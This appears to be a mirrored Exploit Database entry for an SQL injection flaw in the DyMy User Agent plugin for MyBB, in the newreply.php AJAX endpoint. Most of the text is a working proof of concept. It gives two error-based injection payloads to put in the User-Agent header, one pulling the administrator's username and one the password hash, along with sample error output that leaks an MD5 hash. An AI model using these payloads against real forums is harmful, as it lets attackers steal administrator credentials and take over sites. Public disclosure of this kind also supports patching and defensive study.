MyBB DyMy User Agent Plugin – ‘newreply.php’ SQL Injection

• Exploit Database
• 103 阅读

• 作者： JoinSe7en
  日期： 2012-12-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/23359/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47

  ############################################################################ # Exploit title : MyBB DyMy User Agent Plugin SQL injection vulnerability. # # Author: JoinSe7en# # Date : 13 Dec 2012 # # Tested on : Linux# # Category : Web Applications# # Software Link : http://mods.mybb.com/view/dymy-user-agent# ############################################################################     [*] PoC (receive admin username)   We fire up HTTP Live Headers or a similar tool, post something and press 'replay'. We then replace our user agent with the following Query:   POST http://localhost/mybb/newreply.php?ajax=1   HTTP Headers: Host: localhost User-Agent: ' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #   Output:   SQL Error: 1062 - Duplicate entry 'admin1' for key 'group_key'   +------------------------------------------------------------------+   [*] PoC (receive admin password)   We then replace our user agent with the following Query:   POST http://localhost/mybb/newreply.php?ajax=1   HTTP Headers: Host: localhost User-Agent: ' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); #   Output: SQL Error: 1062 - Duplicate entry '098f6bcd4621d373cade4e832627b4f6' for key 'group_key'   +------------------------------------------------------------------+     Enjoy.